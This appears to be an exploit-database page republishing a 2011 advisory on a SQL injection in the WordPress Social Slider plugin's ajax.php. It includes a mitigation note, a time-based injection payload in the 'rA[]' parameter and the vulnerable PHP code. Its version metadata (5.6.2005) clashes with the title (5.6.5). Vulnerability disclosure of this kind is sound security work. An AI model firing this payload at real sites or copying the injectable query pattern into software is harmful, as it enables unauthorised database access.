Social Slider - exploit.company

vendor:

Social Slider

by:

Miroslav Stampar

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Social Slider

Affected Version From: 5.6.2005

Affected Version To: 5.6.2005

Patch Exists: NO

Related CWE: N/A

CPE: a:wordpress:social_slider

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Social Slider <= 5.6.5 SQL Injection Vulnerability

Social Slider is vulnerable to SQL injection due to improper sanitization of user-supplied input in the 'action' and 'rA[]' parameters of the 'ajax.php' script. An attacker can exploit this vulnerability to execute arbitrary SQL commands in the application's database.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL commands that are passed to the database. Parameterized queries should be used to avoid SQL injection.

Source

Exploit-DB raw data:

# Exploit Title: Social Slider <= 5.6.5 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/social-slider-2.zip
# Version: 5.6.5 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/social-slider-2/ajax.php
 action=ZapiszPozycje&rA[]=1 AND SLEEP(5)

---------------
Vulnerable code
---------------
<?php 
require_once(dirname(__FILE__).'/../../../wp-config.php');
global $wpdb, $table_prefix;

$SocialSliderArray = $_POST['rA'];

if (mysql_real_escape_string($_POST['action']) == "ZapiszPozycje")
    {
    $lC = 1;
    foreach ($SocialSliderArray as $recordIDValue)
        {
        $query = "UPDATE ".$table_prefix."socialslider SET lp = ".$lC." WHERE id = ".$recordIDValue;
        mysql_query($query);
        $lC = $lC + 1;    
        }
    }
?>